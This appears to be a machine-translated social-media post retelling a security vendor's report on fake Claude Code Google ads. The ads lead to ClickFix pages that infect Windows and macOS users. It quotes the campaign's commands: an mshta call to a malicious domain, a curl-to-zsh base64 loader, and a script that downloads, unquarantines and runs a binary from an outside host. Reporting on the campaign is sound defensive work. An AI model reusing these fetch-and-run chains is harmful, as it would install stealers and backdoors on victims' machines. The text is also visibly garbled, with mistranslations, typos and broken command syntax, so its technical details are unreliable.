Fake Claude Code Ads Outbreak on Google Latent Malware

Fake Claude Code Ads Outbreak on Google Latent Malware Attack on Windows and macOS

Fake ads for malware release, or Malvertising, are a huge epidemic today. These ads often impersonate the names of many popular IT products or services, and this time Claude Code, a famous artificial intelligence tool, or AI, has also become a victim in their footprint.

According to a report by the anti-malware developer's official website, Bitdefender has mentioned the detection of a malware distribution campaign that focuses on attacking users of the Windows and macOS operating systems. The campaign begins with hackers buying ads from Google to release fake "Claude Code" ads that write ads similar to the real thing. This fake ad appears when the victim searches for the word "download claude code" or similar via Google.

After the victim presses on the advertisement, the advertiser will take the victim to a fake application or Documentation page deposited on Squarespace. The fake page will be similar to the Claude Code page, everything is almost suspicious, except the main observation point, which is a URL that does not match the real thing. In the next step, the page will be presented to the victim to download and install the Claude Code (fake) on the machine. Instead of the normal download, it is an Instruction command in the same way as using a fake bug notice to require the victim to install malware to correct the error. Or ClickFix. This step will be different according to the script on the fake page. The difference will follow this.

For Windows users

It will run the PowerShell command with this command.

C: WindowsSysWOW64mshta exe https: / / download.active-version [.] com / claude

Alternatively, the victim may run the following command via Windows CMD instead.

C: WindowsSysWOW64mshta exe https: / / download.active-version [.] com / claude

Both commands lead to the implementation of mshta.exe, a Windows application for running HTML-based applications or HTA-based files, where running such files leads to downloading a malware installation file of the type to steal data from the victim's machine, or 2 Infostealer down the installation, that is.

Trojan. Stealer. GJ.

Trojan. Stealer. GK.

The downloaded file contains an Executanle File and an HTA file. The latter decrypts a payload file. Microsoft Intermediate Language (MSIL) code is embedded in memory. After decrypting it, the HTA file runs the code to convert it to two other malware:

IL: Trojan. MSILZilla.245316

Gen: Variant. Barys.509034

For macOS users

Since the protection system on macOS is stronger than Windows, the procedure for the victim to do is more complicated. Obfuscation allows malware to infiltrate the victim's machine. Start with the victim running the decoded command. Encoded strings in Base-64 format come out as zsh files with the following command:

echo "macOS Download: http: / / code.claude [.] ai / download /" & & curl -sSfL $(echo '| base64 -D) | zsh

Once the victim has completed the command, the second script will immediately work to decode and decode the Payload code. The script looks like this:

#! / bin / zsh

Tnyrzi = $(base64 -D < < 'PAYLOAD _ END' | gunzip

PAYLOAD _ END

)

Eval "$tnyrzi"

This script will lead to another command to run the Mac-O Binary application file from the https: / / wriconsult [.] com / n8n / update domain with the following command:

#! / bin / zsh

Curl -o / tmp / helper https: / / wriconsult [.] com / n8n / update & & xattr -c / tmp / helper & chmod + x / tmp / helper & / tmp / helper

All of this goes quietly after the victim runs the first command. The malware installed on the victim's machine is an unknown type of Backdoor malware. This malware has the ability to resist running on a simulated environment (Anti-Sandbox or Anti-VM), making it difficult to analyze by tools or experts because the malware will not work in such environments.

# Trending # Lemon 8 Howtoo # lemon 8 diary # freedomhack # Claude